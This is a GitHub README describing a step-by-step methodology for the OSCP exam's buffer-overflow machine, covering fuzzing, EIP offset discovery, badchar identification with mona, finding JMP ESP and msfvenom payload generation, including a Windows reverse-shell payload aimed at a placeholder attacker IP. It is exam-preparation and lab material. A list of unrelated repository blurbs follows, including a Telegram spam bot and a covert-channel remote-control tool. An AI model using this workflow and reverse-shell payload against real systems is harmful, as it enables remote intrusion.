This is a walkthrough about understanding the #BoF machine present in the #OSCP exam.

Overview

Buffer Overflow methodology

GitHub Repo stars GitHub last commit (branch) GitHub

Python 3 GitHub Workflow Status

Twitter Follow

Introduction

These are 7 simple python scripts and a methodology to ease (not automate !) the exploitation. Each script targets a phase of the exploitation :

  1. Trigger the BoF (this is facultative for OSCP since they give you a code snippet)
  2. Find the EIP offset
  3. Confirm the offset
  4. Find the badchars
  5. Confirm badchars + find JMP ESP instruction
  6. Confirm code execution (pop calc)
  7. Exploit host

It's based on the do stack buffer overflow good" project (BTW, it's awesomely explained).

How to use

Follow each step and you'll be able to craft a working example of a BoF exploitation.

All the specific variable are stored in 1 single resource file, to avoid any confusion during the exam.

After each step, fill the proper variables with values found and they'll be re-used for the next step

Note: If after each debug operation performed, the application has become unresponsive; Immunity Debugger should be closed first, then the "vulnapp.exe" application should be restarted, and Attach and Run should be done on Immunity Debugger.

0. Pre-start

Fill in the following variables in the resource file depending on the host to attack :

  • RHOST : the IP address of the host
  • RPORT : the port on which to access the application to exploit

1. Segmentation fault : 1_segfault.py

Send enough length string for victim system crash.

Please note that the total length to input is often given in the exmaple they provide in the exam.

Note the offeset in PARAMETERS.py, in the variable offset_eip.

2. Find the offset : 2_find_offset.py

Generate the pattern (adapt the buffer lenght) :

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <String_Length>

buf += ("<PATTERN>")

Put the output into the variable buf in 2_find_offset.py & send it.

Once the app crashes, note down the value of the EIP register (which is the address of the next operation to be executed).

If needed : convert the EIP value to ASCII : echo "<EIP_value>" | xxd -r -p

Find the offset at which the sequence is met in the pattern :

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_value>

Or, type this in Immunity Debugger : !mona findmsp.

Note the value of the EIP offet in the variable offset_eip in PARAMETERS.py, and the value of the ESP offset in the variable offset_esp.

3. Control the EIP : 3_confirm_offset.py

Execute this script as is.

In Immunity Debugger, make sure that

  • BBBB in the EIP (in hex, so 42424242)
  • CCCCDDDDD..... is written in what ESP points to

4. Find the bad chars : 4_find_badchars.py

Send it to the application

In Immunity Debugger, make mona create a list of badchars :

!mona bytearray –cpb “\x00”

The console output will tell you where it has been saved.

Compare this file with the stack contents :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

**Note: **always use the full path to the file !

In the mona output, Possibly bad chars are output. Put them in the badchars array in PARAMETERS.py.

5. Confirm badchars & find a JMP ESP instruction : 5_find_jmp_esp.py

a. Confirm badchars

Make sure the badchars identified are mentionned in the PARAMETERS.py file.

Execute the script.

Re-generate a badchar sequence on mona :

!mona bytearray -cpb "\x00\x04\x05\xA2\xA3\xAC\xAD\xC0\xC1\xEF\xF0"

The console output will tell you where it has been saved.

Compare the bytearray.bin (use the full filepath) and the buffer to make sure they are the same. That will mean that no new badchar have been detected :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

The mona output status should be unmodified and you should get a message in the console saying : !!! Hooray, normal shellcode unmodified !!!

This mean that no other badchars have been detected.

b. Find a JMP ESP

Ask mona to find the instruction JMP ESP that will allow the processor to execute whatever we have put in the stack.

!mona jmp -r esp -cpb "<bad_chars>"       formatted like this : "\x00\x01"

Put the address returned in the variable ptr_jmp_esp in PARAMETERS.py

6. Pop calc : 6_pop_calc.py

This will confirm the code execution on the target host. This can be used to validate the build-up of the exploit, and set a working basis.

Launch this to produce the shellcode that will make calc pop on the target :

msfvenom -p windows/exec -b '<badchars>' -f python --var-name shellcode_calc \
CMD=calc.exe EXITFUNC=thread

Insert the output (python variable shellcode_calc) in the script 6_pop_calc.py.

In the script, we will also move ESP up in the stack (instruction SUB ESP,0x10) This is to avoid the ESP overwrite by the encoder of the payload. Some guys use a NOP sled, here is a more proper way ;)

Launch the script and enjoy popping calc!

7. Create shellcode : 7_exploit.py

Now, you can craft any other shellcode as long as you respect the badchars :

msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_Port> \
-f py -b '<badchars>' -e x86/shikata_ga_nai -var-name shellcode

Insert the output (python variable shellcode_calc) in the script 7_exploit.py.

Owner
3isenHeiM
Just a pentester knowing some python/bash, trying to make his life smarter ;) Also an Linux/CyberSec/CTF lover
3isenHeiM
A Powerful Telethon Based Telegram Spam Bot.

Yukki Multi Spam Bot 🚀 Deploy on Heroku You can Use these API ID and API HASH while deploying String Session No Requirement of API ID and API HASH Ge

46 Dec 23, 2022
A simple Discord bot that notifies users of new Abitti versions

A simple Discord bot that notifies users of new Abitti versions. New features might be added later on. If you have good ideas, feel free to do a PR.

1 Feb 11, 2022
Home Assistant Hilo Integration via HACS

BETA This is a beta release. There will be some bugs, issues, etc. Please bear with us and open issues in the repo. Hilo Hilo integration for Home Ass

66 Dec 23, 2022
Cloudshell-sandbox-reporter - Helper modules and classes for writing to Cloudshell sandbox console

Cloudshell Sandbox Reporter This project provides utility classes for formatting

QualiLab 2 Sep 07, 2022
Quot-a-lecture - Lecture transcript question extraction

Setup virtualenv venv source venv/bin/activate pip install -r requirements.txt

Pratyaksh Sharma 5 Sep 12, 2022
✨ A simple project to automate some stuffs in Habbo with G-Earth ✨

⚡️ Habbo G-Earth extensions ⚡️ ✨ A simple project to automate some stuffs in Habbo with G-Earth ✨ About | Getting Started | Authors ➤ Getting Started

Lucca Pessoa 1 Jan 09, 2022
Google Drive, OneDrive and Youtube as covert-channels - Control systems remotely by uploading files to Google Drive, OneDrive, Youtube or Telegram

covert-control Control systems remotely by uploading files to Google Drive, OneDrive, Youtube or Telegram using Python to create the files and the lis

Ricardo Ruiz 52 Dec 06, 2022
A simple terminal UI for viewing fund P/L analysis through TEFAS

Tefas UI A simple terminal UI for viewing fund P/L analysis through TEFAS. Features (that my own bank's UI lack): Daily and weekly P/L FX comparisons

Batuhan Taskaya 4 Mar 14, 2022
a discord bot for searching your movies, and bot return movie url for you :)

IMDb Discord Bot how to run this bot. the first step you must create prefixes.json file the second step you must create a virtualenv if you use window

Mehdi Radfar 6 Dec 20, 2022
BiliBili-live-barrage-transceiver - A simple python program for sending and receiving barrage in bilibili live room

BiliBili-live-barrage-transceiver - A simple python program for sending and receiving barrage in bilibili live room

zeroy 2 Jan 18, 2022
This repository is used to provide data to zzhack,

This repository is used to provide data to zzhack, but you don't have to care about anything, just write your thinking down, and you can see your thinking is rendered in zzhack perfectly

5 Apr 29, 2022
Intelligent Trading Bot: Automatically generating signals and trading based on machine learning and feature engineering

Intelligent Trading Bot: Automatically generating signals and trading based on machine learning and feature engineering

Alexandr Savinov 326 Jan 03, 2023
Trabalho N1 para a materia Tecnicas de Progamação da Anhembi Morumbi

Projeto da Anhembi Morumbi - Tecnicas de Programação. RPG de Console (CMD) Trabalho proposto pelo professor André Santana, na materia Tecnicas de Prog

Leonardo Silva M de Barros 3 Sep 12, 2021
WaifuGen - A program made in waifuGen that generates SFW and NSFW waifus from the waifu.pics API

waifuGen A program made in waifuGen that generates SFW and NSFW waifus from the

1 Jan 05, 2022
LoL 台版10周年活動自動輸入邀請碼

LoLTW_10Year_88Event LoLTW 8.8 周年慶 邀請碼自動輸入 設定 在 LoLTW_10Year_88Evnet.exe 的位置建立一個檔案 .env,內容如下 Bahamut_Discussion = https://forum.gamer.com.tw/C.php?bsn

古丁丁 5 Dec 13, 2021
Google Sheets Python API v4

pygsheets - Google Spreadsheets Python API v4 A simple, intuitive library for google sheets which gets your work done. Features: Open, create, delete

Nithin Murali 1.4k Jan 08, 2023
Bin Checker with Aiogram, Telegram

Bin Checker with Aiogram, Telegram

JEFF 1 Aug 16, 2022
Plazmix API wrapper for Python

An optimised, easy to use Plazmix API wrapper written in Python

Someone 2 Nov 16, 2021
A simple telegram bot to forward files from one channel to other.

Forward_2.0 Bot to forward messages from one channel to other without admin permission in source channel. Can be used for both private and Public chan

SUBIN 56 Dec 29, 2022
Discord Bot Sending Members - Leaked by BambiKu ( Me )

Wokify Bot Discord Bot Sending Members - Leaked by BambiKu ( Me ) Info The Bot was orginaly made by someone else! Ghost-Dev just wanted to sell "priva

bambiku 6 Jul 05, 2022